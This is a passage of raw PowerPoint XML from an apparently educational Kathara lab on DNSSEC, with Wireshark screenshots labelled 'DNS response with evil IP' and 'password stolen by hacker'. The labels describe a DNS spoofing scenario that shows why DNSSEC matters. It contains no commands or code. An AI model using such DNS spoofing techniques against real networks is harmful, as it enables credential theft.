                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF948083-2C84-0256-2221-A7936D2DE2E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, elettronica, schermata, schermo&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADEF5DAE-55B9-7B91-18FC-DCA5DFC886FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="10527"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1246910" y="992084"/>
            <a:ext cx="9908770" cy="5373090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD2692A2-E9B5-2F7A-3004-CE5C8A7625AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9350941" y="2799600"/>
            <a:ext cx="2736850" cy="454239"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45304"/>
              <a:gd name="adj2" fmla="val -117815"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DNS response packet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5E6BFC1-5F89-9079-838A-1278FEA6008A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4670185" y="4405293"/>
            <a:ext cx="2736850" cy="430736"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -83487"/>
              <a:gd name="adj2" fmla="val -40802"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DNS query flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1038736-224C-3DF4-3254-959FD81A6049}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5870369" y="5010383"/>
            <a:ext cx="3073333" cy="855533"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -125808"/>
              <a:gd name="adj2" fmla="val 4334"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the name searched in the DNS query (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Qname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0"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0A2EF6-3685-A591-05A6-5CBE3CD8167C}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24578" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B9DC57-7D30-F08F-CAE8-E4A6A738D77D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4262C7B5-3E19-0EFD-333D-DABE27310BE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72A90081-44F5-FD63-DE99-84A2C37AA246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, elettronica, schermata, software&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A21E1161-9F43-A06F-2E13-C59BF8B2DABA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="5051"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1132115" y="1071433"/>
            <a:ext cx="9927770" cy="5381758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{729552A5-8E3D-59F6-6FD5-35B901A3E26F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6881960" y="4200641"/>
            <a:ext cx="2736850" cy="855533"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99976"/>
              <a:gd name="adj2" fmla="val 161185"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DNS response with evil IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E37C5D-AC8C-69AF-01F6-5C98C9E0B1D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9326398" y="1841523"/>
            <a:ext cx="2736850" cy="462290"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1124"/>
              <a:gd name="adj2" fmla="val 137317"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DNS response packet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33746739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A1B1AE-9D4A-8F3D-62F9-5E9B9F4669E4}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24578" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F01A47C-EAD5-9DAC-2EDB-B372A4418E6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1082FC01-086D-1782-7D80-AB9C31625CCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F6D1C5F-1620-F2A7-CBA5-B2343A367180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene testo, elettronica, schermata, software&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADB1D471-39E5-E8CB-E949-90B9E57BB7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0891" y="1002061"/>
            <a:ext cx="10550218" cy="5451130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB6EDEF9-95FD-4CCF-510C-D527FE117CE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4815654" y="1979955"/>
            <a:ext cx="2736850" cy="855533"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99976"/>
              <a:gd name="adj2" fmla="val 161185"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>serial number stolen by hacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC204AAC-873E-DCFC-59C0-3A648762AB63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4815654" y="4592527"/>
            <a:ext cx="2736850" cy="855533"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -100844"/>
              <a:gd name="adj2" fmla="val -120592"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>password stolen by hacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360169671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E8DECB-5AA9-F747-FF53-E6F1EAED5B5B}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Rectangle 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{558EC134-A5F6-AF4B-7266-9E42ED0DD39A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>lab configuration with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and without redundancy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AFD2DF7-C653-C256-79E6-C0B962CC50FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01A24727-DE84-2C76-E4AE-C5EAFC1D2F3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10433B8-397D-3EC7-7F8A-E6DD1095870D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197266395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C4537E-B476-C179-698B-903545D16B3D}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DA8036B-55B9-21D3-E423-41B42539408A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
